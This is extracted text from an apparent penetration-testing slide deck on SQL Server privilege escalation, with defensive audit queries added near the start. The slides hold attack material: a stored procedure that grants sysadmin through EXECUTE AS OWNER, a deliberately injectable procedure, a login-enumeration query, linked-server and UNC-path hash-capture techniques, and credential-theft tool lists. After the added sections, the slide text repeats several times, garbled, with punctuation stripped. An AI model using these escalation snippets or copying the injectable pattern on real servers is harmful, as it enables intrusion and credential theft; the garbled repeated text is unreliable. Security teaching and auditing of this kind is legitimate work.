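CREATE PROCEDURE sp_sqli2_fixed
    @DbName sysname
AS
BEGIN
    SET NOCOUNT ON;
    -- The SQL text is a constant. The caller's value is bound as a parameter, so a
    -- @DbName such as  x' OR 1=1--  is matched as a literal pattern, never parsed.
    DECLARE @query nvarchar(max) =
        N'SELECT name FROM master..sysdatabases WHERE name LIKE @pattern OR name = N''tempdb''';
    DECLARE @pattern nvarchar(300) = N'%' + @DbName + N'%';
    EXEC sp_executesql @query, N'@pattern nvarchar(300)', @pattern = @pattern;
END;
GO

-- Audit: procedures that impersonate (EXECUTE AS OWNER / SELF / 'user') and also build
-- dynamic SQL. In sys.sql_modules, execute_as_principal_id is NULL for EXECUTE AS CALLER
-- and -2 for EXECUTE AS OWNER. The LIKE tests are a heuristic; review the hits by hand.
SELECT OBJECT_SCHEMA_NAME(m.object_id) AS schema_name,
       OBJECT_NAME(m.object_id)        AS procedure_name,
       CASE m.execute_as_principal_id
            WHEN -2 THEN 'OWNER'
            ELSE USER_NAME(m.execute_as_principal_id)
       END                             AS executes_as,
       CASE WHEN m.definition LIKE '%sp_executesql%' THEN 'sp_executesql (parameterised?)'
            WHEN m.definition LIKE '%EXEC%(%'        THEN 'EXECUTE(string): inspect'
            ELSE 'static' END          AS sql_style
FROM sys.sql_modules m
JOIN sys.objects o ON o.object_id = m.object_id
WHERE o.type = 'P'
  AND m.execute_as_principal_id IS NOT NULL
ORDER BY sql_style, procedure_name;
```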
Escalating Privileges: Shared Service Accounts - Why should I care about shared service accounts?
1. SysAdmins can execute OS commands
2. OS commands run as the SQL Server service account
3. Service accounts have sysadmin privileges by default
4. Companies often use a single domain account to run hundreds of SQL Servers
5. So if you get sysadmin on one server, you have it on all of them
One account to rule them all
[Figure: Leveraging Shared MS SQL Server Service Accounts. Diagram built up over four slides: network zones Internet, DMZ and Intranet; hosts LRA, HVA, LVA and ADS; ports 80 and 443 from the Internet, 1433 and 1434 on the Intranet. Attack path: (1) SQL Injection by "Captain Evil" against the LVA; (2) execute local command via xp_cmdshell; (3) access to the HVA with the shared domain service account, executing commands and gathering data from other database servers via osql. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges: Crawling Server Links

Escalating Privileges: Crawling Server Links - What's a database link?
Database links are basically persistent database connections for SQL Servers
Why should I care?
Short answer = privilege escalation
• Public role can use links to execute queries on remote servers (impersonation)
  SELECT * FROM OpenQuery([SQLSERVER2],'SELECT @@Version')
• Stored procedures can be executed (xp_cmdshell)
• Links can be crawled
[Figure: Leveraging MS SQL Database Links. Diagram built up over five slides on the same network layout (Internet, DMZ, Intranet; LRA, HVA, LVA, ADS; ports 80 and 443, 1433 and 1434). Attack path: (1) SQL Injection by "Captain Evil" against DB1 on the LVA; from there a "DB link with least privileges" reaches one server and a "DB link with SA account" reaches another; (2) execute SQL queries and local commands on database servers via nested linked services. Key: HVA = High Value Application, LVA = Low Value Application.]
Escalating Privileges: Crawling Server Links - Penetration Test Stats
Database links exist (and can be crawled) in about 50% of environments we've seen
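An added audit query (not from the original slides) that lists the linked servers on an instance and how their logins are mapped, so the "DB link with SA account" case from the diagrams can be found from the defending side.

```sql
-- Added example, not from the original slides: audit linked servers on the local instance.
-- sys.servers lists every linked server; sys.linked_logins lists the login mappings.
-- local_principal_id = 0 is the default mapping for ALL local logins, i.e. anyone holding
-- PUBLIC can reach the remote server with that identity.
SELECT s.name                       AS linked_server,
       s.data_source,
       s.provider,
       s.is_rpc_out_enabled,                                -- EXEC ... AT server works
       s.is_data_access_enabled,                            -- OPENQUERY works
       CASE ll.local_principal_id
            WHEN 0 THEN 'ALL LOCAL LOGINS'
            ELSE SUSER_NAME(ll.local_principal_id)
       END                          AS local_login,
       CASE WHEN ll.uses_self_credential = 1 THEN '(pass-through)'
            ELSE ll.remote_name END AS remote_login,
       CASE
            WHEN ll.local_principal_id = 0 AND ll.remote_name = 'sa'
                 THEN 'HIGH: every local login becomes sa on the remote server'
            WHEN ll.local_principal_id = 0 AND ll.uses_self_credential = 0
                 THEN 'MEDIUM: every local login maps to one fixed remote login'
            WHEN ll.local_principal_id = 0 AND s.is_rpc_out_enabled = 1
                 THEN 'MEDIUM: pass-through for all logins with RPC out enabled'
            ELSE 'review'
       END                          AS finding
FROM sys.servers s
LEFT JOIN sys.linked_logins ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1
ORDER BY s.name, ll.local_principal_id;
```

Run it on every instance in the chain, since a link that looks harmless locally may land on a server whose own links are mapped to sa.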
Escalating Privileges: UNC Path Injection
• UNC paths are used for accessing remote file servers, like so: \\192.168.1.4\file
• Almost all procedures that accept a file path in SQL Server support UNC paths
• UNC paths can be used to force the SQL Server service account to authenticate to an attacker
• An attacker can then capture the NetNTLM password hash and crack or relay it
• Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges: UNC Path Injection
Oh yeah…
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path: xp_dirtree, xp_fileexist

So in summary…
The PUBLIC role can access the SQL Server service account NetNTLM password hash by default

But who really has PUBLIC role access?
Oh yeah, a ton of domain users
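An added check and fix (not from the original slides) for the default PUBLIC grant on the two procedures just named.

```sql
-- Added example, not from the original slides: confirm whether PUBLIC can still run the
-- two file-path procedures, then revoke that right. The grant lives in master, where the
-- extended procedures are defined.
USE master;
GO
-- Check: does PUBLIC hold EXECUTE on xp_dirtree / xp_fileexist?
SELECT OBJECT_NAME(p.major_id) AS procedure_name,
       pr.name                 AS grantee,
       p.permission_name,
       p.state_desc            -- GRANT means any PUBLIC member can call it
FROM sys.database_permissions p
JOIN sys.database_principals pr ON pr.principal_id = p.grantee_principal_id
WHERE p.class = 1                                     -- object-level permission
  AND p.major_id IN (OBJECT_ID('dbo.xp_dirtree'), OBJECT_ID('dbo.xp_fileexist'))
  AND pr.name = 'public';
GO
-- Fix: drop the default grant. Anything that legitimately needs these procedures gets
-- EXECUTE granted to it explicitly instead of inheriting it through PUBLIC.
REVOKE EXECUTE ON dbo.xp_dirtree   FROM public;
REVOKE EXECUTE ON dbo.xp_fileexist FROM public;
GO
-- Re-run the check above: it should now return no rows.
```

Revoking the grant removes only the default path; blocking outbound SMB (TCP 445) from database hosts to untrusted networks stops the forced authentication itself, whichever procedure triggers it.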
Escalating Privileges: DEMO
DEMO: Get-SQLServiceAccountPwHashes
…what? It's self descriptive
Escalating Privileges: OS Admin to SysAdmin

Escalating Privileges: OS Admin to SysAdmin - Two things to know…
1. Different SQL Server versions can be abused in different ways
2. All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges: OS Admin to SysAdmin

Approach              2000   2005   2008   2012   2014   2016
LSA Secrets            x      x      x      x      x      x
Local Administrator    x      x
LocalSystem            x      x      x
Process Migration      x      x      x      x      x      x
Token Stealing         x      x      x      x      x      x
Single User Mode              x      x      x      x      x

Below are some options for leveraging that knowledge
Escalating Privileges: OS Admin to SysAdmin - Here are some tool options

Approach                                                      | Common Tools
Access as Local Administrator                                 | Management Studio, sqlcmd and other native SQL client tools
Access as LocalSystem                                         | Psexec, accessibility options debugger, with native SQL client tools
Recover SQL Server service account password from LSA Secrets  | Mimikatz, Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process   | Metasploit, Empire, Python, PowerShell, C, C++ (LoadLibrary/CreateRemoteThread and similar functions)
Steal authentication token from SQL Server service process    | Metasploit Incognito, Invoke-TokenManipulation
Single User Mode                                              | DBATools
Common Post Exploitation Activities

Post Exploitation Overview - Common Post Exploitation Activities
1. Establish Persistence
   • SQL Server Layer: startup procedures, agent jobs, triggers, modified code
   • OS Layer: registry & file auto runs, tasks, services, etc.
2. Identify Sensitive Data
   • Target large databases
   • Locate transparently encrypted databases
   • Search columns based on keywords and sample data
   • Use regular expressions and the Luhn formula against data samples
3. Exfiltrate Sensitive Data
   • All standard methods: copy database, TCP ports, UDP ports, DNS tunneling, ICMP tunneling, email, HTTP, shares, links, etc. (No exfil in PowerUpSQL yet)
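An added query (not from the original slides) that walks the SQL Server layer persistence spots listed under item 1 so they can be baselined and reviewed in one result set.

```sql
-- Added example, not from the original slides: one pass over the SQL Server layer
-- persistence spots (startup procedures, agent jobs, triggers, modified code), returning
-- a single result set an analyst can diff against a known-good baseline.
SELECT 'startup procedure' AS kind,
       QUOTENAME(SCHEMA_NAME(p.schema_id)) + '.' + QUOTENAME(p.name) AS name,
       p.modify_date
FROM master.sys.procedures p
WHERE OBJECTPROPERTY(p.object_id, 'ExecIsStartup') = 1   -- runs every time the service starts

UNION ALL
SELECT 'server trigger', QUOTENAME(t.name), t.modify_date
FROM sys.server_triggers t                                -- e.g. a LOGON trigger

UNION ALL
SELECT 'agent job' + CASE WHEN j.enabled = 1 THEN '' ELSE ' (disabled)' END,
       QUOTENAME(j.name) + ' owner=' + ISNULL(SUSER_SNAME(j.owner_sid), '?'),
       j.date_modified
FROM msdb.dbo.sysjobs j

UNION ALL
-- Job steps that shell out or run PowerShell are the ones to read first.
SELECT 'agent job step (' + s.subsystem + ')',
       QUOTENAME(j.name) + ' step ' + CAST(s.step_id AS varchar(10)),
       j.date_modified
FROM msdb.dbo.sysjobsteps s
JOIN msdb.dbo.sysjobs j ON j.job_id = s.job_id
WHERE s.subsystem IN ('CmdExec', 'PowerShell')

UNION ALL
-- "Modified code": procedures, triggers and functions in the current database changed
-- in the last 30 days; compare the list against the release calendar.
SELECT 'recently modified ' + LOWER(o.type_desc),
       QUOTENAME(SCHEMA_NAME(o.schema_id)) + '.' + QUOTENAME(o.name),
       o.modify_date
FROM sys.objects o
WHERE o.type IN ('P', 'TR', 'FN', 'TF', 'IF')
  AND o.modify_date > DATEADD(DAY, -30, SYSDATETIME())
ORDER BY modify_date DESC;
```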
Escalating Privileges: Weak Passwords
2. Get principal id for the sa account with "suser_id"
3. Use "suser_name" to get SQL logins using just the principal ID
4. Increment number and repeat

select n [id], SUSER_NAME(n) [user_name]
from ( select top 10000 row_number() over(order by t1.number) as N
       from master..spt_values t1 cross join master..spt_values t2) a
where SUSER_NAME(n) is not null

Code gifted from @mobileck
Source: https://gist.github.com/ConstantineK/c6de5d398ec43bab1a29ef07e8c21ec7

3. Grab the first 48 Bytes of the full RID
RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000
SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling Server Links
Escalating Privileges Crawling Server LinksWhatrsquos a database link
Database links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
UNC paths are used for accessing remote file servers like so 19216814file
Almost all procedures that accept a file path in SQL Server support UNC paths
UNC paths can be used to force the SQL Server service account to authenticate to an attacker
An attacker can then capture the NetNTLM password hash and crack or relay it
Relay becomes pretty easy when you know which SQL Servers are using shared accounts
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection
Oh yeahhellip
By DEFAULT the PUBLIC role can execute (at least) two procedures that accept a file path
xp_dirtreexp_fileexists
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
Escalating Privileges Weak Passwords
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
